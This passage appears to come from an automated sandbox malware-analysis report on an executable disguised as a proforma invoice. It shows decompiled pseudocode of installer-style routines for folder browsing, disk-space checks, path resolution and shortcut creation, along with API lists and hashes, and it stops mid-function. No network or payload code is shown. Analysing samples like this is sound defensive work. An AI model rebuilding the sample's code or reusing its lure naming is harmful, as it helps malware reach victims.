ShowWindow.USER32(?,00000005), ref: 00404AA9
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BAC
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C11
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C26
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C4A
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C70
ImageList_Destroy.COMCTL32(?), ref: 00404C85
GlobalFree.KERNEL32 ref: 00404C95
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D05
SendMessageA.USER32(?,00001102,00000410,?), ref: 00404DAE
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404DBD
InvalidateRect.USER32(?,00000000,00000001), ref: 00404DDD
ShowWindow.USER32(?,00000000), ref: 00404E2B
GetDlgItem.USER32 ref: 00404E36
ShowWindow.USER32(00000000), ref: 00404E3D

Strings

M, xrefs: 00404A03
, xrefs: 00404E15
N, xrefs: 00404AE7

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: dede86c728acf6a11cc3ab5fbc78af527f28fbd96654b5baab0c469e43695f01
Instruction ID: 91af9d563adbb526dddc39620d8b288a2aea1bcbb5731436b9e02a5cfbe7d22d
Opcode Fuzzy Hash: dede86c728acf6a11cc3ab5fbc78af527f28fbd96654b5baab0c469e43695f01
Instruction Fuzzy Hash: AB029FB0E00209AFDB21DF54DD45AAE7BB5FB84315F10817AF610BA2E1C7799A42CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404356, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404356(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr* _t138;
				signed int* _t145;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc70;
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040540B(0x3fb, _t162);
					E00405DC8(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040540B(0x3fb, _t162);
							if(E0040573A(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405B66(0x41f468, _t162);
							_t145 = 0;
							_t86 = E00405E88(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405B66(0x41f468, _t162);
								_t88 = E004056ED(0x41f468);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f468,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f468) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f468,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E004056A0(0x41f468) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f468) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E004047A6(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x42367c + 0x10)) != _t145) {
									E004046F1(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f458);
									} else {
										E004046F1(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403F3A(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x42048c == _t145) {
									E004042EB();
								}
								 *0x42048c = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x4204a0;
							_v56 = E0040468B;
							_v52 = _t162;
							_v64 = E00405B88(0x3fb, 0x4204a0, _t162, 0x41f870, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405659(_t162);
								_t125 =  *((intOrPtr*)( *0x423eb0 + 0x11c));
								if( *((intOrPtr*)( *0x423eb0 + 0x11c)) != 0 && _t162 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
									E00405B88(0x3fb, 0x4204a0, _t162, 0, _t125);
									if(lstrcmpiA(0x422e40, 0x4204a0) != 0) {
										lstrcatA(_t162, 0x422e40);
									}
								}
								 *0x42048c =  &(( *0x42048c)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E004056C6(_t162) != 0 && E004056ED(_t162) == 0) {
						E00405659(_t162);
					}
					 *0x423678 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403F18(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403F18(_t159);
					E00403F4D(_v12);
					_t138 = E00405E88(7);
					if(_t138 == 0) {
						L53:
						return E00403F7F(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}

0x0040435c
0x00404363
0x0040436f
0x0040437d
0x00404385
0x00404389
0x0040438f
0x0040438f
0x0040439b
0x0040440f
0x00404416
0x004044eb
0x004044f2
0x00404501
0x00404501
0x00404505
0x0040450b
0x00404518
0x0040451a
0x0040451a
0x00404528
0x0040452d
0x00404530
0x00404537
0x0040453a
0x00404571
0x00404573
0x00404579
0x00404580
0x00404582
0x00404582
0x0040459e
0x004045da
0x00000000
0x004045a0
0x004045a3
0x004045b7
0x004045b9
0x00000000
0x004045b9
0x0040453c
0x00404540
0x0040456f
0x0040456f
0x00000000
0x00000000
0x00000000
0x00000000
0x00404542
0x00404542
0x0040454f
0x00404554
0x00000000
0x00000000
0x00404558
0x0040455a
0x0040455a
0x00404565
0x00404568
0x0040456d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040456d
0x004045c8
0x004045cf
0x004045d6
0x004045dd
0x004045dd
0x004045e2
0x004045e4
0x004045ec
0x004045f2
0x004045f2
0x00404602
0x0040460c
0x00404614
0x0040462a
0x00404616
0x0040461a
0x0040461a
0x00404614
0x0040462f
0x00404634
0x00404639
0x00404642
0x00404642
0x0040464b
0x0040464d
0x0040464d
0x00404659
0x00404661
0x0040466b
0x0040466b
0x00404670
0x00000000
0x00404670
0x0040453a
0x004044f4
0x004044fb
0x00000000
0x00000000
0x00000000
0x004044fb
0x0040441c
0x00404422
0x0040443c
0x00404441
0x0040444b
0x00404452
0x00404461
0x00404464
0x00404467
0x0040446e
0x00404476
0x00404479
0x0040447d
0x00404484
0x0040448c
0x004044e4
0x0040448e
0x0040448f
0x00404496
0x004044a0
0x004044a8
0x004044b5
0x004044c9
0x004044cd
0x004044cd
0x004044c9
0x004044d2
0x004044dd
0x004044dd
0x0040448c
0x00000000
0x00404441
0x0040442f
0x00000000
0x00000000
0x00404435
0x00000000
0x0040439d
0x0040439d
0x004043a9
0x004043b3
0x004043c0
0x004043c0
0x004043c6
0x004043cf
0x004043d8
0x004043db
0x004043de
0x004043e6
0x004043e9
0x004043ec
0x004043f4
0x004043fb
0x00404402
0x00404676
0x00404688
0x00404688
0x0040440d
0x00000000
0x0040440d

APIs

GetDlgItem.USER32 ref: 004043A2
SetWindowTextA.USER32(?,?), ref: 004043CF
SHBrowseForFolderA.SHELL32(?,0041F870,?), ref: 00404484
CoTaskMemFree.OLE32(00000000), ref: 0040448F
lstrcmpiA.KERNEL32(Call,004204A0,00000000,?,?), ref: 004044C1
lstrcatA.KERNEL32(?,Call), ref: 004044CD
SetDlgItemTextA.USER32 ref: 004044DD

Part of subcall function 0040540B: GetDlgItemTextA.USER32 ref: 0040541E

Part of subcall function 00405DC8: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
Part of subcall function 00405DC8: CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
Part of subcall function 00405DC8: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
Part of subcall function 00405DC8: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42

GetDiskFreeSpaceA.KERNEL32(0041F468,?,?,0000040F,?,0041F468,0041F468,?,00000000,0041F468,?,?,000003FB,?), ref: 00404596
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B1
SetDlgItemTextA.USER32 ref: 0040462A

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 004044AA
Call, xrefs: 004044BB, 004044C0, 004044CB
A, xrefs: 0040447D

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A$C:\Users\user\AppData\Local\Temp$Call
API String ID: 2246997448-3265145871
Opcode ID: 6525314df4a180c9e7b66623ed26d8b7b6bbf618626a18de822d55977fdbc2f3
Instruction ID: fa341535892c43c3a67d7fcafb17cb6574160925603278dae289bcadb551eaae
Opcode Fuzzy Hash: 6525314df4a180c9e7b66623ed26d8b7b6bbf618626a18de822d55977fdbc2f3
Instruction Fuzzy Hash: 2D9170B1900218BBDB11AFA1CD84AAF7BB8EF45314F10847BF704B6291D77C9A41DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00405B88, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00405B88(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				signed int _t74;
				signed int _t75;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42367c - 4 + _t36 * 4);
				}
				_t74 =  *0x423ed8 + _t36;
				_t37 = 0x422e40;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405B88(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x424000;
							E00405B66(_t86, (_t95 << 0xa) + 0x424000);
						} else {
							E00405AC4(_t86,  *0x423ea8);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405DC8(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423ea4;
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423ea8,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423ed8;
							E00405A4D(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423ed8, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405B88(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405B66(_a4, _t37);
			}

0x00405b88
0x00405b88
0x00405b88
0x00405b8e
0x00405b93
0x00405ba4
0x00405ba4
0x00405baf
0x00405bb1
0x00405bb6
0x00405bb9
0x00405bba
0x00405bc1
0x00405bc3
0x00405bc9
0x00405bcc
0x00405bcc
0x00405da5
0x00405da5
0x00405da9
0x00000000
0x00000000
0x00405bd9
0x00405bdf
0x00000000
0x00000000
0x00405be5
0x00405be6
0x00405be9
0x00405bec
0x00405d98
0x00405da2
0x00405da4
0x00405da4
0x00405d9a
0x00405d9c
0x00405d9e
0x00405d9f
0x00405d9f
0x00000000
0x00405d98
0x00405bf2
0x00405bf6
0x00405c06
0x00405c0a
0x00405c11
0x00405c14
0x00405c18
0x00405c1e
0x00405c21
0x00405c24
0x00405c27
0x00405d42
0x00405d45
0x00405d75
0x00405d78
0x00405d7d
0x00405d81
0x00405d81
0x00405d86
0x00405d87
0x00405d8c
0x00405d8f
0x00405d91
0x00000000
0x00405d91
0x00405d47
0x00405d4a
0x00405d5f
0x00405d66
0x00405d4c
0x00405d53
0x00405d53
0x00405d6e
0x00405d71
0x00405d3a
0x00405d3b
0x00405d3b
0x00000000
0x00405d71
0x00405c2f
0x00405c30
0x00405c36
0x00405c38
0x00405c52
0x00405c52
0x00405c59
0x00405c59
0x00405c60
0x00405c64
0x00405c64
0x00405c65
0x00405c67
0x00405ca0
0x00405ca3
0x00405cb3
0x00405cb6
0x00405cbe
0x00405cc4
0x00405cc4
0x00405d20
0x00405d20
0x00405d22
0x00000000
0x00000000
0x00405cc8
0x00405ccf
0x00405cd0
0x00405cd2
0x00405cec
0x00405cfa
0x00405d00
0x00405d02
0x00405d1d
0x00405d1d
0x00405d1d
0x00000000
0x00405d1d
0x00405d08
0x00405d13
0x00405d19
0x00405d1b
0x00000000
0x00000000
0x00000000
0x00405d1b
0x00405cd4
0x00405cd7
0x00000000
0x00000000
0x00405ce6
0x00405ce8
0x00405cea
0x00000000
0x00000000
0x00000000
0x00405cea
0x00000000
0x00405d20
0x00405cab
0x00000000
0x00405c69
0x00405c6e
0x00405c84
0x00405c89
0x00405c8c
0x00405d29
0x00405d29
0x00405d2d
0x00405d35
0x00405d35
0x00000000
0x00405d2d
0x00405c96
0x00405d24
0x00405d24
0x00405d27
0x00000000
0x00000000
0x00000000
0x00405d27
0x00405c67
0x00405c3a
0x00405c3e
0x00000000
0x00000000
0x00405c40
0x00405c44
0x00000000
0x00000000
0x00405c46
0x00405c4a
0x00000000
0x00405c4c
0x00405c4c
0x00000000
0x00405c4c
0x00405c4a
0x00405daf
0x00405db9
0x00405dc5
0x00405dc5
0x00000000

APIs

GetVersion.KERNEL32(?,0041FC78,00000000,00404F3C,0041FC78,00000000), ref: 00405C30
GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405CAB
GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405CBE
SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405CFA
SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00405D08
CoTaskMemFree.OLE32(00000000), ref: 00405D13
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D35
lstrlenA.KERNEL32(Call,?,0041FC78,00000000,00404F3C,0041FC78,00000000), ref: 00405D87

Strings

Call, xrefs: 00405BB1, 00405C78, 00405C95, 00405CAA, 00405CBD, 00405CD9, 00405D04, 00405D34, 00405D3A, 00405D52, 00405D65, 00405D80, 00405D86, 00405D91, 00405DBB
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405D2F
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405C7A

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-1230650788
Opcode ID: 855ce943f005fc76d33ba75c1c33b75b466f9e158227b928842345586457093f
Instruction ID: 2bb53c71d9fe9ef1e56bc14ab20fd8486271744d1d3ead2cb2ad614034e11287
Opcode Fuzzy Hash: 855ce943f005fc76d33ba75c1c33b75b466f9e158227b928842345586457093f
Instruction Fuzzy Hash: D7510131A04A04AAEF205F64DC88B7B3BA4DF55324F14823BE911B62D0D33C59829E4E

Uniqueness

Uniqueness Score: -1.00%

Function 00402020, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00402020() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029F6(0xfffffff0);
				_t96 = E004029F6(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029F6(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029F6(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029F6(0x45);
				if(E004056C6(_t96) == 0) {
					E004029F6(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409368, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409368, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}

0x00402029
0x00402033
0x0040203c
0x00402046
0x0040204f
0x00402059
0x0040205d
0x0040205d
0x00402062
0x00402073
0x0040207b
0x0040215b
0x0040215b
0x00402162
0x00402081
0x00402081
0x00402092
0x00402096
0x0040209c
0x004020a6
0x004020a8
0x004020b3
0x004020b6
0x004020c3
0x004020c5
0x004020c7
0x004020ce
0x004020d1
0x004020d1
0x004020d4
0x004020de
0x004020e6
0x004020eb
0x004020f7
0x004020f7
0x004020fa
0x00402103
0x00402106
0x0040210f
0x00402114
0x00402126
0x00402135
0x00402137
0x00402143
0x00402143
0x00402135
0x00402145
0x0040214b
0x0040214b
0x0040214e
0x00402154
0x00402159
0x0040216e
0x00000000
0x00000000
0x00000000
0x00402159
0x00402164
0x0040288e
0x0040289a

APIs

CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402073
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409368,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 004020AB

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-47812868
Opcode ID: 20f8b56c3263d051d76756f701b26ac218ff209cd135641c8178b13e20f06e8d
Instruction ID: 0b92ce9401c32f92a97655b67b17bc3e2e7042a2ba93bb40bff56c30807ccd12
Opcode Fuzzy Hash: 20f8b56c3263d051d76756f701b26ac218ff209cd135641c8178b13e20f06e8d
Instruction Fuzzy Hash: 94418E75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040263E, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040263E(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029F6(2), _t19 - 0x1a4) != 0xffffffff) {
